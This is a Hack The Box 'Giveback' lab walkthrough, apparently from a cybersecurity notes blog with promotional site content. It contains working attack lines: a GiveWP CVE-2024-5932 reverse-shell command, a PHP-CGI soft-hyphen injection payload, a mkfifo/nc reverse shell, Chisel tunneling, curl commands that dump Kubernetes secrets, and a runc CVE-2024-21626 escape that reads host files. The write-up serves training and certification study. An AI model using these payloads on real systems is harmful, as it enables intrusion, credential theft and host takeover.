HTB Giveback Writeup & Walkthrough

HTB Giveback Writeup & Walkthrough

HTB Giveback

Look, if you've spent any time grinding through complex lab environments or knocking out rooms, you already know that some machines are just built different and are specifically designed to break your standard, muscle-memory operational habits, and HTB GiveBack is absolutely one of those incredibly layered boxes.

I want to be super clear right out of the gate: we aren't doing a standard, paint-by-numbers exploit walkthrough here where you just blindly copy and paste terminal commands until a root flag magically drops onto your screen. Instead, we're taking a step back and looking at this purely through a learning-first, methodology breakdown lens, because the real, lasting value of a machine like this isn't in memorizing what to type, but in genuinely understanding how to think.

By stripping away the literal command syntax and focusing heavily on the overarching enumeration strategy, those critical decision-making patterns, and the deep architectural reasoning behind the vulnerabilities, the goal is to help you build a robust mental model that you can actually transfer to real-world assessments, advanced certifications, and the messy production environments you might be testing.

If you're genuinely invested in your long-term growth as a security practitioner and you want to understand why these attack paths exist rather than just how to trigger them, this analytical approach is going to compound massively for you over time, but if you're just looking for a quick write-up to get the points and move on, this probably isn't the breakdown for you.

Lets start with the skills tested in this box

When you first spin up GiveBack, the initial access phase actually feels pretty familiar, mostly just testing your diligence in modern CMS exploitation by asking you to hunt down and leverage some known vulnerabilities within the GiveWP WordPress plugin just to get your foot in the door.

However, you are going to quickly realize that this initial breach is really just a decoy stepping stone, and the true gauntlet actually kicks off post-foothold, where the environment aggressively tests your situational awareness inside a highly restricted, containerized space.

You are completely forced to rely on a deep understanding of lateral movement, navigating through confusing internal routing complexities, and deploying your proxy tools creatively just to interact with heavily isolated network segments that are completely invisible from the outside world.

On top of all that, the machine throws a curveball by testing your knowledge of some seriously obscure PHP CGI misconfigurations, specifically that incredibly nuanced soft-hyphen bypass, forcing you to figure out how to execute arbitrary commands through interfaces that look perfectly secure at first glance.

Finally, the privilege escalation phase is just an absolute masterclass in modern container escape mechanics, directly challenging your familiarity with the notorious runc CVE-2024-21626 vulnerability and testing whether you can critically analyze and cleanly bypass poorly written bash-based deny lists using basic directory traversal instead of just throwing automated exploits at the wall to see what sticks.

Enumeration

Your initial recon with Nmap is going to spit out the standard web ports you'd expect to see, but the real aha moment comes when you notice the differing Time-To-Live (TTL) values between the SSH and HTTP services, which is a massive, albeit subtle, clue that practically screams you are dealing with a virtualized or containerized backend infrastructure.

Once you identify the target WordPress application, you have to realize that relying solely on passive observation is completely insufficient; you must aggressively enumerate the site, utilizing an API token to ensure you are getting highly accurate vulnerability mapping of installed plugins like GiveWP rather than just guessing based on generic version numbers.

Article content

To achieve shell, you will need to exploit CVE-2024-5932 vulnerability:

uv run CVE-2024-5932-rce.py --url http://giveback.htb/donations/the-things-we-need/ --cmd 'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"'

With your listener running, you will have your first shell.

After you finally achieve reverse shell via CVE-2024-5932 and discover a legacy application running on a separate internal pod (10.43.2.241)

This service is vulnerable to a Best-Fit character encoding bypass.

Vulnerability: Bypassing previous fixes for CVE-2012-1823 by using the %AD (soft hyphen) character, which Windows-style CGI handling interprets as a dash (-).

Legacy Hint: Look for indicators like Windows-style CGI handling retained for legacy scripts.

RCE Payload Snippet:

PHP
// Bypasses the dash filter to inject PHP-CGI arguments $url = http://lt;Internal_IPgt;:5000/cgi-bin/php-cgi?%ADd+auto_prepend_file%3Dphp%3A%2F%2Finput; 
// The POST body contains the PHP code to execute

Note: If bash is missing in the container, use a standard POSIX pipe reverse shell: 

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2gt;amp;1|nc lt;Attacker_IPgt; lt;Portgt; gt;/tmp/f

Kubernetes Cluster Pivot

After gaining a shell in the legacy pod, the focus shifts to internal cluster enumeration and secret harvesting.

Environment Discovery:

  • env: Check for KUBERNETES_SERVICE_HOST variables.
  • ls /var/run/secrets/kubernetes.io/serviceaccount/: Check for the JWT token and CA cert.

 

  • Interacting with the API (using curl):

 

Bash
# Get all secrets in the current namespace 
curl -sk -H "Authorization: Bearer $(cat token)" \ https://kubernetes.default.svc/api/v1/namespaces/default/secrets

Credential Recovery: Data in K8s secrets is Base64 encoded.

echo "<Encoded_String>" | base64 -d

Privilege Escalation: Container Runtime Abuse (runc)

The final stage involves escaping a containerized environment or abusing host-level binary wrappers. The target provides a custom wrapper /opt/debug around runc.

Scenario A: Host FS Mount (Direct Abuse) If runc allows custom OCI specs, you can mount the host's root directory into a new container.

runc spec: Generate a default config.json.

Modify config.json: Change the root path and add a mount for /.

sudo /opt/debug run <ID>: Execute the container to gain a root shell on the host filesystem.

Scenario B: CVE-2024-21626 (runc Escape)

A critical vulnerability involving a file descriptor leak during the runc run or runc exec process.

By setting the cwd (current working directory) to /proc/self/fd/7, an attacker can access the host's filesystem through the leaked file descriptor.

Exploit Snippet:

# Modifying the OCI spec to point to the leaked FD
sed -i 's/"cwd": "/"cwd": "\/proc\/self\/fd\/7"/' config.json
# Running the container then allows access to host files (e.g., /etc/shadow)
sudo /opt/debug run <ID>

Commands Cheat Sheet

Having a repository of precise syntax is crucial for maintaining momentum in environments as complex as this machine.

For the initial WordPress reconnaissance, executing

wpscan --url http://10.10.11.94 -e ap,u --api-token <YOUR_TOKEN>

is essential for uncovering the critical GiveWP vulnerability.

Once inside the initial container, setting up a stable reverse proxy requires transferring the Chisel binary and initiating the server on your attack machine with:

./chisel server --reverse --port 9000 --socks5,

followed by executing

./chisel client 10.10.14.X:9000 R:socks

Once inside the initial pod, establishing your internal proxy is paramount; launch your listener with 

./chisel server --reverse --port 9000 --socks5

And execute the client connection from the compromised container via

./chisel client 10.10.14.X:9000 R:socks

To exploit the internal PHP-CGI interface, you must craft a highly specific POST request routed through your newly established proxy, injecting the soft-hyphen payload to force code execution:

curl -x socks5h://127.0.0.1:1080 -X POST -d "<?php system('id'); ?>" "http://10.43.2.241:5000/cgi-bin/php-cgi?%ADd+auto_prepend_file%3Dphp%3A%2F%2Finput"

When inspecting the Kubernetes environment, manual API interaction is often cleaner than deploying heavy binaries; extract the cluster secrets by executing: 

curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" https://10.43.0.1/api/v1/namespaces/default/secrets.

Escaping the Common Rabbit Holes

One of the most frustrating and common ways I see people fail on GiveBack is by getting brutal tunnel vision right after that initial exploit, where they will stubbornly waste hours upon hours banging their head against the wall trying to escalate privileges on that first WordPress container instead of realizing it's just a jumping-off point.

So many folks completely miss the glaring architectural red flags surrounding them, totally ignoring the lack of user mappings in the /etc/passwd file or the weird absence of a database service on localhost, missing the dead giveaways that they are sitting inside a Kubernetes pod.

Another huge roadblock pops up during the exploitation of that PHP CGI interface; people constantly misunderstand the highly specific encoding requirements of the soft-hyphen vulnerability, either forgetting to URL-encode their payload properly or totally botching the routing of their tools through their proxy setup, which just leads to a nightmare of timeout errors.

When it comes to the final privilege escalation phase, a remarkably common mistake is vastly overcomplicating the runc container escape by blindly firing off automated exploitation scripts instead of taking five minutes to just manually read the /opt/debug wrapper script.

 Skipping that basic code review leads so many people to completely miss the intentionally flawed deny list, which can actually be effortlessly bypassed with some simple, old-school directory traversal, a fix that is way more elegant and reliable than trying to wrestle with complex file descriptor manipulation.

Tooling Up for the Job

When you are looking at your toolbelt for this one, WPScan is going to be your go-to authenticated enumeration framework, but you absolutely have to remember to feed it those API tokens if you want accurate patch levels for those obscure plugins, proving that unauthenticated guessing is a waste of time here.

Once you are actually inside the network, Chisel rapidly becomes the MVP of your toolkit, and you'll use it to effortlessly punch dynamic holes right through those strict Kubernetes networking restrictions to perfectly bridge your local attack box with those hidden internal subnets.

Burp Suite Professional really shines during the exploitation of that internal CMS, because its advanced proxy configurations let you seamlessly route your traffic straight through your Chisel tunnels, allowing you to manually craft, encode, and repeat those incredibly delicate PHP CGI payloads until you get them exactly right.

Finally, you really need to lean heavily on native command-line utilities rather than relying on pre-compiled exploit binaries; tools like jq are an absolute lifesaver for quickly parsing the massive, unreadable JSON walls of text returned by the Kubernetes API, and standard Linux file manipulation commands are completely critical for building the precise OCI container bundles you need to successfully trigger the runc escape.

The Real-World Takeaways and Cert Prep

If a box like GiveBack teaches us anything, it's the terrifying reality that a heavily armored external perimeter means absolutely nothing if your internal architecture is basically a house of cards built on unpatched software and way too much trust between isolated network segments.

The initial breach is a perfect reminder of why organizations desperately need rigorous, automated patch management for third-party CMS plugins, so benign-looking tools like GiveWP don't silently turn into massive remote code execution liabilities overnight.

Furthermore, that secondary compromise perfectly highlights the hidden, catastrophic dangers of keeping legacy tech like PHP CGI interfaces alive on the network, and it shows just how useless superficial deny lists are when you have an intelligent attacker who can just find a syntactical bypass, proving you need native orchestrator-level least privilege, not flimsy bash wrappers. 

Because it covers all of this so well, GiveBack is an absolutely top-tier training ground if you are currently prepping for the OSCP, as it heavily reinforces the core methodology of getting a foothold, pivoting intelligently, and leveraging internal services to push your attack forward. It's also an absolute gold mine of practice for anyone targeting cloud-heavy credentials like the CKS, given how deep you have to dive into Kubernetes enumeration and modern container escape mechanics.

0 comments

Leave a comment

Our Best Pick of Cyber Security Notes
Certified Security Blue Team Level 2 (BTL2) Study Notes (Unofficial)

Cyber Security Certification Notes

The Kali Linux Pentesting Cheat Sheet

Cyber Security Study Guides

Master AI for Content Creation, Business & Marketing

AI & ML Study Guides

The Definitive Networking Cheat Sheet (Tools)

IT Study Guides

Cybersecurity · Offensive & Defensive · Practitioner-First

Stop reading docs.
Start thinking like an attacker.

Field-ready notes, methodology breakdowns, and certification cheat sheets built by a practitioner for practitioners.

Browse Free Notes Unlock Premium →
62K+YouTube Subscribers
20K+Web Visitors
4K+Students and Professionals Using The Notes

What's in the vault

Two tiers.
One clear mission.

Whether you're just getting started or deep in the trenches, there's a tier built for where you are right now. Free notes cover the essentials — premium unlocks the full playbook.

Free Access

The essentials,
on the house.

A curated library of beginner and intermediate notes you can access right now — no signup, no friction.

  • Introductory walkthroughs on core concepts
  • Tool overviews: Nmap, Burp Suite, Metasploit & more
  • Selected HTB writeup summaries
  • Foundational blue team methodology notes
  • YouTube companion write-ups
Start Reading Free
Premium

The full
practitioner playbook.

Every note, every cheat sheet, every methodology breakdown — structured the way a senior analyst actually thinks.

  • Full OSCP, CPTS, OSWE, HTB CDSA prep DISCOUNTS
  • Complete HTB machine writeups (Guardian, Expressway & more)
  • AI Red Teaming tooling comparison notes
  • SOC analyst learning roadmaps & playbooks
  • Threat intelligence methodology guides
  • Malware analysis case studies (NotPetya & more)
  • New content added continuously
Become a Member →

Coverage

What you'll actually use.

Notes built around real engagements, real exam objectives, and real SOC workflows — not a rehash of vendor documentation.

#Penetration TestingOSCP · CPTS · HTB
#Web App SecurityOSWE · Bug Bounty
#SOC & Blue TeamCDSA · SIEM · IR
#Threat IntelligenceTAXII · YARA · MITRE
#Malware AnalysisReverse Engineering
#AI Red TeamingGarak · PyRIT · LLM Sec
#Network SecurityActive Directory · Pivoting
#Tooling & AutomationScripts · Integrations

Cert Coverage

OSCP CPTS OSWE HTB CDSA CEH CompTIA Sec+ eJPT

The author

Motasem Hamdan

I'm a cybersecurity practitioner, technical writer, and content creator who got tired of resources that treat readers like beginners forever.

My notes are built the way I wish someone had built them when I was grinding through certs and CTFs — methodology-first, practitioner-grade, and structured for how analysts actually think on the job.

Over 62,000 people on YouTube follow along. Thousands more read on the site every month. These aren't notes for passing an exam and forgetting everything — they're references you'll keep coming back to.

YouTube Channel @MotasemHamdan · 62K+ subscribers Main Site motasem-notes.net Store shop.motasem-notes.net
motasem_notes — practitioner.sh
whoami
motasem_hamdan — cybersec_practitioner

cat expertise.txt
offensive_security: advanced
blue_team_soc:      advanced
threat_intel:       advanced
technical_writing:  practitioner-grade

ls content/
htb_writeups/  cert_cheatsheets/
ai_red_team/   soc_methodology/
threat_intel/  malware_analysis/

cat philosophy.txt
"teach how to think,
 not just what to type."

_

Membership

One subscription.
Everything unlocked.

Skip the hours lost searching fragmented resources. One membership gives you the full library, updated continuously as the threat landscape evolves.

Free $0 forever
  • Foundational notes library
  • Selected HTB summaries
  • YouTube companion write-ups
  • Tool overview guides
Start Reading
Most Popular Premium Member $15 / month · cancel anytime
  • Full notes library (100+ resources)
  • Cert prep DISCOUNTS: OSCP, CPTS, OSWE, CDSA
  • Complete HTB machine writeups
  • SOC analyst methodology playbooks
  • AI Red Teaming notes
  • Threat intelligence guides
  • New content every week
  • Priority access to new releases
Become a Member →
Store : One-Time Pay What You Want
  • Buy individual cheat sheets
  • Downloadable PDFs & guides
  • No recurring commitment
  • Yours to keep permanently
Browse Store

FAQ

Good questions.


The free tier has solid foundational content. Premium notes are written for intermediate-to-advanced practitioners — they assume you know the basics and want to go deeper. If you're grinding toward OSCP or working in a SOC, you'll feel right at home.
Continuously. New walkthroughs, methodology updates, and cheat sheets drop regularly — aligned with new HTB machines, cert updates, and emerging threat topics. As a member, you get access to everything as it lands.
Yes, absolutely. Membership is managed through Buy Me a Coffee — you can cancel any time directly from your account. No long-term lock-in, no awkward cancellation flows.
The membership gives you ongoing access to the full library for a monthly fee. The store lets you buy individual resources once and own them permanently — good if you just need one specific cert pack.
Definitely. Head to @MotasemHamdan on YouTube — over 62K subscribers and a large back-catalogue of walkthroughs, tool demos, and methodology breakdowns. Best way to see if the teaching style clicks for you before committing to anything.
motasem-notes.net Practitioner-grade cybersecurity notes & resources.
Site Store YouTube Membership